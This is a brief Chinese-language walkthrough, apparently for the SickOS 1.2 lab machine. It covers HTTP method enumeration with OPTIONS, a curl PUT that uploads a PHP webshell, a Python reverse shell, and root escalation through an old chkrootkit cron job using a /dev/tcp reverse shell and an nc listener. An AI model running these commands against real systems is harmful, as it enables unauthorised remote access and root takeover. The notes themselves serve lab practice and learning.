1.关于lighthttp旧版本
存在请求方法的遍历,可以抓一个访问的请求包,然后将get请求更换为options,接着看返回包找的allow,就能看见所允许的方法,
2.关于curl的用法
1.curl查看所有能使用的请求方法如下
curl -v -X OPTIONS http://192.168.11.131/test
2.curl指定请求方法,如put,并向指定路径写入指定内容的语法如下
curl -v -X PUT -d '<?php system($_GET["cmd"]);?>' http://192.168.11.131/test/shell.php
3.使用weevely生成的webshell,在上传后,执行linpeas扫描脚本无回显的情况解决方案
换个webshell,比如常用的python反弹shell(这个取决于对方服务器上是否相关的运行环境)
export RHOST="192.168.11.131";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
3.关于提权
1.区别于sickos1.1的sudo提权,sickos1.2采用的是crontab提权,也就是计划任务提权,他的基本思路是,靶机存在chkrookit这个反rootkit病毒的程序,且该程序会定期运行chkrootkit
利用条件如下
1.在/ tmp中放入一个名为'update'的非root所有者的可执行文件
2.以Root身份运行chkrootkit
Chkrootkit 版本小于0.49,其文件/ tmp /update将以root身份执行。
如果攻击者知道管理员是定期运行chkrootkit(通过查看cron.daily获知),并且对/ tmp(没有挂载noexec)有写访问权限,就可以利用该漏洞获取root权限。
2.exp
printf '#!/bin/bash\nbash -i >& /dev/tcp/192.168.11.131/443 0>&1\n' >> /tmp/update
chmod 777 /tmp/update
nc -nlvp 443
备注,可能刚开始执行完以后shell没变化或者是断开了,这时候只要再执行一次就可以,成功拿到root权限 的shell
祝各位打靶愉快,天天开心~!